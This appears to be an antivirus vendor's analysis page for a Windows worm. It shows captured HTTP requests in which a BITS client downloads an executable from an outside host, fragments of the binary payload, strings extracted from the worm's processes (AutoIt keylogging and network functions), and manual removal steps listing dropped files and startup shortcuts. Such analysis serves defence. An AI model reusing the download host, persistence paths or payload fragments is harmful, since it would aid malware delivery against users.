If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=375633-746714
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 375633-746714/893637
Content-Length: 371082
Date: Thu, 17 Aug 2017 08:17:05 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
......\...w(TK..Zr..c.}.]".S..g.w6.8.GH.-K.......X.....0y|J.....%eh\..
E..?P..G...)........r[.Y #.Gh....P......J.~..fUU:.eC....s.....5,......
...F.o.Xs..i...  !=q.TN*.....k.E.[..Ii?...;X.. ... .x!.,..P.VTZ...'s..
.3"...s.....].B..../pQ...(.......U.................Z-....9.X~.... ....
d..e....."../..$..F.w....U,..1].@.O.<%..7Q.5....2.lD.w...d.........
.8<a.0..).. x.%.......-...S..P......|=N.uH"e..kD.H*..{-P.f.....hu0.
.R.g...?../....%JD.S....g5.........aN..Xe....9..I....9R..D..p.2....L..
..l..kZ.=o...`.*.....%w..4....D.m.p....5.4..}4...dEG..He....p(.-#4.[..
\l..(.NZ...[..m.v.8U.nv@...W#C.#...B9.~.lX.b7`.Kpv....9....i.&.8v_Ns.N
.....s.F!.8h.q.q......8.(U.AT..FH). ....Hr&.w......<..]..=.8..\v'^(
oJ".3j..J8`J. b.q).e.{..f...&........'.@..Vd/..D..rl..................
..>...k.3...0=.<.p.=.|..6....m..e..EA.........B.../..o....6....b
Yt..q.<v...3..*q...%7..,?Zn.}1kNo..hw...(.-...d........I2F..%o.s%V.
...;)...5|..PL>..Al.k...o.K.!....S...S.v.g.O..]u(/.4...@1J7.).Y.=..
5J(.R...t...q..)..M. .H<. .o..W...A#~6.N:...\.T*4.n{J$.....#.<..
.y.....v%.p....w..X.Ax......f........'X..*.....GE..!Wr..".2...s.K:...,
R.i....{7.-.Qx...t..@./vqU_.......=*.0.n..6.m.....,...g2.-s.Y.@Bu/^G.*
.I..M.V .........{..M.....k.4va.n.s.1.%...W...h...]...BL.....`....At..
6.rg<..j>L..F...........[.0.i.....V8.)..&..5..?D.....ZH.M.....&g
t;....f..2D<l.............w.Ju.V..o..L.8y.....4.....P..]......@..&g
t;G......v.9s .z.?z....=>%.............*.a..-...Uq.(Gh..k..P0....t.
|c.. ..8..=...pQ.....nZ=.......PT......Gf.K..y#.M.. ..0.8L.......F
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=746715-893636
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 746715-893636/893637
Content-Length: 146922
Date: Thu, 17 Aug 2017 08:17:06 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
../.......>D!._..`~ .S..e..G.L..%/..D....450.Z!].L,.......]........
......Q.f.z..m."..}../.[....>..*........k..;.n.\..N...]6...p.Mre...
....>...............]...|.Z:.....)....M&j.)Ct..(..8...D.........'-.
.^..,n..dY..2.;n..........\.O.1z.{.y.u..Ny..HhUKh.w.CK.C]..G.Q.D.....7
d..G{@@...o....s..a.6.o..EH...X....Ev..'Y....@-@......|p@'.p..`.J*....
.d..V.0.....F...(........KV.c.I..a.3..;r.....I._U...nU............0..W
r.i.........k.....p\?.E`.7X...n..^._.-d.HN...k.{.a.L. .s=6.a...`..).4.
z.B./...}.x.....}e~...h"Aw..z=..[.....6.9C...,..D.2J...........$7.c._I
.E..s.T..`];.8.o..e[?L_....2....Qy..o.>.L9....{X....!eB.tO....t...g
[. .O\S'.r.X2....S.."..t...]-XU.g...7i..........;x....X.m.k.s...[_.g..
.1%...p............A|..b............>.o.<A LN`.. ..ml`.d..tz.~.&
....&.......M....&h...75.A.l77..@..$.L=.R..=-..r.......h..D......U....
0.....-.H.....Y...$.f.....u.z..?2..eR.(]...2d..J.D:...Oi.-....lO...[._
=.......2Yw...d..x..#....TM;.)...."Ro..K.v.D..Y..T......0.k.ZK@.e.TB..
F.f....3&f...5...t..5&..4.fF{:.......Q...J..cr.."...G~M.........D.....
.k..|.,..R.L..{...n...A.0..r.: ../G....%...M]4:]".5q{FO....gW....}.]..
....S..Ar...}{`...........P....[......wD....C. ...X>}....._.A.....k
a....H.Pt...w7_O.S..xQ..\E .@.v..E-:`.,.dS....h9......7.GYHhA....u..W.
....rr...x..p.....L.........p.A..q......byI...H..F)e.....6|\.2....M...
..v...nlh....n...Dsql..V.Z.'.OM.m...a....n.'3..}U.O.J.t:..*l..}m......
...!s.W.3.p..9.T.......)A.a.'.5t}..u.S...=... V`.'A\\_....B.-)...?g...
.#..{. .O..Z ..P..S...K..h}y.A....1.L......e..p.........b. #.Gu...
<<< skipped >>>

The Worm connects to the servers at the folowing location(s):

%original file name%.exe_2748:

.text
`.rdata
@.data
.gfids
@.rsrc
@.reloc
t,j.Xj\f
f9.tDj.
FtPQ
COMCTL32.dll
SHLWAPI.dll
USER32.dll
GDI32.dll
COMDLG32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
operator
operator ""
%S#[k
InvokeMainViaCRT
ExitMainViaCRT
Microsoft.CRTProvider
D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.didat$5
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
SHFileOperationW
ShellExecuteExW
sfxrar.exe
SetThreadExecutionState
GetCPInfo
KERNEL32.dll
GetProcessHeap
c:\%original file name%.exe
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!--The ID below indicates application support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!--The ID below indicates application support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
>$> >2>}>
5Maximum allowed array size (%u) is exceeded
rtmp%d
Crypt32.dll
version.dll
DXGIDebug.dll
sfc_os.dll
SSPICLI.DLL
rsaenh.dll
UXTheme.dll
dwmapi.dll
cryptbase.dll
lpk.dll
usp10.dll
clbcatq.dll
comres.dll
ws2_32.dll
ws2help.dll
psapi.dll
ieframe.dll
ntshrui.dll
atl.dll
setupapi.dll
apphelp.dll
userenv.dll
netapi32.dll
shdocvw.dll
crypt32.dll
msasn1.dll
cryptui.dll
wintrust.dll
shell32.dll
secur32.dll
cabinet.dll
oleaccrc.dll
ntmarta.dll
profapi.dll
WindowsCodecs.dll
srvcli.dll
cscapi.dll
slc.dll
imageres.dll
dnsapi.DLL
iphlpapi.DLL
WINNSI.DLL
netutils.dll
mpr.dll
devrtl.dll
propsys.dll
mlang.dll
samcli.dll
samlib.dll
wkscli.dll
dfscli.dll
browcli.dll
rasadhlp.dll
dhcpcsvc6.dll
dhcpcsvc.dll
XmlLite.dll
linkinfo.dll
cryptsp.dll
RpcRtRemote.dll
aclui.dll
dsrole.dll
peerdist.dll
uxtheme.dll
Please remove %s from %s folder. It is unsecure to run %s until it is done.
WaitForMultipleObjects error %d, GetLastError %d
Shell.Explorer
<head><meta http-equiv="content-type" content="text/html; charset=
riched20.dll
%s %s %s
%s %s
GETPASSWORD1
winrarsfxmappingfile.tmp
M-d-d-d-d-d-d
sfxcmd
__tmp_rar_sfx_access_check_%u
-el -s2 "-d%s" "-p%s" "-sp%s"
%s.%d.tmp
Software\Microsoft\Windows\CurrentVersion
%s%s%d
KERNEL32.DLL
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
Windows

WScript.exe_3808:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
iu2.iu3;ku_
advapi32.dll
wscript.exe
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
1.191>1[1
: :$:(:,:0:4:8:<:
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Windows Based Script Host
5.8.7600.16385
Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled.SAttempt to execute Windows Script Host remotely while remote execution is disabled.
Missing job name.*Unicode is not supported on this platform.
<The Windows Script Host settings have been reset to default.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

Security.exe_1128:

`.rsrc
QRA.Sb
j.Yf;
r%f;M
j.Xf;
j.Zf;
PSSSSSSh
Gt.Ht$
.ku`8iu~fiu
kernel32.dll
?#%X.y
GetProcessWindowStation
operator
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
zcÁ
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
UnregisterHotKey
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
1!<....(
%c=/Kr
<*-('(-)/)((4
H%d=j@
.text
`.rdata
@.data
.rsrc
@.reloc
GAOz,.MA
K.ye4
cr`.HU-
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
IPHLPAPI.DLL
MPR.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
SHELL32.dll
USER32.dll
USERENV.dll
UxTheme.dll
VERSION.dll
WININET.dll
WINMM.dll
WSOCK32.dll
/AutoIt3ExecuteScript
/AutoIt3ExecuteLine
CMDLINE
CMDLINERAW
>>>AUTOIT NO CMDEXECUTE<<<
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MAPKEYS
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDownDelay
SendKeyDelay
TCPTimeout
mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
789:;<=>?
APPSKEY
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
KEYS
\\?\UNC\
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 14, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\Security.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.
>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
10.9.14393.0
Windows Driver Host
3.3.14.2

sworiginal.exe_3336_rwx_003C2000_00001000:

e:.hH

sworiginal.exe_3336_rwx_004B5000_00001000:

ZXYfeeXeXYZa ;9
v2.0.50727

sworiginal.exe_3336_rwx_004C4000_00001000:

ntdll.dll

sworiginal.exe_3336_rwx_06320000_00020000:

d%sd3

sworiginal.exe_3336_rwx_06380000_0000B000:

Y.odP
.xA~5P

Security.exe_1128_rwx_01361000_000DC000:

j.Yf;
r%f;M
j.Xf;
j.Zf;
PSSSSSSh
Gt.Ht$
.ku`8iu~fiu
kernel32.dll
?#%X.y
GetProcessWindowStation
operator
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
zcÁ
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
UnregisterHotKey
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
1!<....(
%c=/Kr
<*-('(-)/)((4
H%d=j@
.text
`.rdata
@.data
.rsrc
@.reloc
/AutoIt3ExecuteScript
/AutoIt3ExecuteLine
CMDLINE
CMDLINERAW
>>>AUTOIT NO CMDEXECUTE<<<
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MAPKEYS
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDownDelay
SendKeyDelay
TCPTimeout
mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
789:;<=>?
APPSKEY
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
KEYS
\\?\UNC\
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 14, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\Security.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WScript.exe:3584
    WScript.exe:2952
    32.exe:3980
    sww.exe:3436
    %original file name%.exe:2748

  2. Delete the original Worm file.
  3. Delete or disinfect the following files created/modified by the Worm:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\32.bat (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\Security.exe (767 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\1.VBS (133 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\1.bat (29 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Security.exe.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\system.exe (5249 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F76.tmp (120 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Service.vbs (298 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\5.bat (87 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F74.tmp (120 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F64.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F62.tmp (64 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\32.vbs (124 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\1.vbs (64 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F77.tmp (218 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F75.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service.vbs.lnk (683 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F63.tmp (83 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\64.bat (392 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\64.vbs (124 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\sworiginal.exe (130 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\sww.exe (20825 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 2 (1 vote)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now